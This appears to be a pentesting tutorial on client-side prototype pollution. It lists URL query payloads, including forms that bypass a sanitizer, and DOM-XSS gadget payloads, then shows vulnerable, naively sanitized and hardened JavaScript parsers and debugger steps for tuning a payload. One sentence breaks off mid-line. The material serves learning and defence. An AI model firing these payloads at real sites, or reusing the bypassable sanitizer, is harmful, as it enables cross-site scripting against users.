Prototype Pollution in Client-Side
Last modified: 2023-04-10
Check whether we can assign an arbitrary property via the URL query string. The parser has to walk nested keys (`a[b]=c` or `a.b=c`) without rejecting `__proto__`, `constructor` and `prototype`; try the following variants, including the doubled-keyword forms that survive a sanitizer which strips each keyword only once:

```
https://example.com/?__proto__[foo]=bar
https://example.com/?__proto__.foo=bar
https://example.com/?constructor[prototype][foo]=bar
https://example.com/?constructor.prototype.foo=bar

# Bypass sanitization (removing "__proto__" or "constructor" once leaves the keyword behind)
https://example.com/?__pro__proto__to__[foo]=bar
https://example.com/?__pro__proto__to__.foo=bar
https://example.com/?constconstructorructor[prototype][foo]=bar
https://example.com/?constconstructorructor.prototype.foo=bar
https://example.com/?constconstructorructor[protoprototypetype][foo]=bar
https://example.com/?constconstructorructor.protoprototypetype.foo=bar
```
Open the browser console and type the following to check whether the property above was assigned to `Object.prototype` (both expressions resolve to the same object):

```
Object.prototype.foo
constructor.prototype.foo
// the expected output: "bar"
```
If the polluted property is later read by application code and written into an HTML element (a gadget), we can turn it into DOM-based XSS as below.
Assume the key name of the property is "source_url", whose value is loaded as "src" in a
```
https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=alert(1)-
```
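To see why the URL forms above work, here is an added example (not code from the original page): a minimal deep query-string parser of the kind that lets `?__proto__[foo]=bar` reach `Object.prototype`, a naive single-pass sanitizer that the `__pro__proto__to__` and `constconstructorructor` tricks bypass, a gadget that reads a never-set `source_url` setting, and a hardened parser. All function names and the gadget are this example's own choices; in a browser you would feed it `location.search` instead of the constructed strings used in the test.

```javascript
// Added example, not code from the original page. Function names and the
// "source_url" gadget are assumptions made for illustration.

// Split "a[b][c]" or "a.b.c" into a key path, as deep-parsing libraries commonly do.
function keyPath(key) {
  return key.replace(/\]/g, '').split(/[\[.]/).filter(Boolean);
}

// Split "?k1=v1&k2=v2" into decoded [key, value] pairs.
function splitPairs(search) {
  return search.replace(/^\?/, '').split('&').filter(Boolean).map((pair) => {
    const eq = pair.indexOf('=');
    return eq === -1
      ? [decodeURIComponent(pair), '']
      : [decodeURIComponent(pair.slice(0, eq)), decodeURIComponent(pair.slice(eq + 1))];
  });
}

// Walk the key path into `root`, creating intermediate objects on demand.
// Nothing checks the segment names, so "__proto__" resolves (via the inherited
// accessor) to Object.prototype, and "constructor" then "prototype" reaches the
// same object: the final assignment lands on Object.prototype.
function assignPath(root, path, value) {
  let cur = root;
  for (let i = 0; i < path.length - 1; i++) {
    if (cur[path[i]] == null) cur[path[i]] = {};
    cur = cur[path[i]];
  }
  cur[path[path.length - 1]] = value;
}

// Vulnerable parser: the pattern behind "?__proto__[foo]=bar".
function parseQueryVulnerable(search) {
  const out = {};
  for (const [key, value] of splitPairs(search)) assignPath(out, keyPath(key), value);
  return out;
}

// Naive fix: strip the dangerous words. String.prototype.replace with a string
// pattern removes only the first match, so "__pro__proto__to__" collapses to
// "__proto__" and "constconstructorructor" to "constructor".
function parseQueryNaiveSanitizer(search) {
  const out = {};
  for (const [key, value] of splitPairs(search)) {
    const cleaned = key.replace('__proto__', '').replace('constructor', '');
    assignPath(out, keyPath(cleaned), value);
  }
  return out;
}

// Gadget: application code reads an optional setting. When the app never set it,
// the lookup falls through to Object.prototype, and the attacker's value is what
// would be written into a script "src".
function scriptSrcFromConfig(config) {
  return config.source_url === undefined ? null : String(config.source_url);
}

// Hardened parser: drop any pair whose path contains a key that walks the
// prototype chain, and build prototype-less objects so that even a missed name
// cannot reach Object.prototype.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function parseQueryHardened(search) {
  const out = Object.create(null);
  for (const [key, value] of splitPairs(search)) {
    const path = keyPath(key);
    if (path.some((seg) => FORBIDDEN.has(seg))) continue; // reject the whole pair
    let cur = out;
    for (let i = 0; i < path.length - 1; i++) {
      if (cur[path[i]] == null) cur[path[i]] = Object.create(null);
      cur = cur[path[i]];
    }
    cur[path[path.length - 1]] = value;
  }
  return out;
}
```

The two parsers differ only in the key check and the object prototype; the rest of the logic is identical, which is why a denylist alone is fragile and why the prototype-less object is the safety net. The gadget function also shows the console check from above from the application's side: `{}.source_url` is read, and it is the polluted `Object.prototype.source_url` that comes back.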
- In the browser's developer tools, find the line of code that reads the polluted property and click the line number at the left of the line to add a breakpoint. Then reload the page.
- Execution pauses on the highlighted breakpoint line. Hover over the target property to check the value currently assigned to it.
- Adjust the payload until the value that reaches the sink executes it, checking the property's value at the breakpoint each time.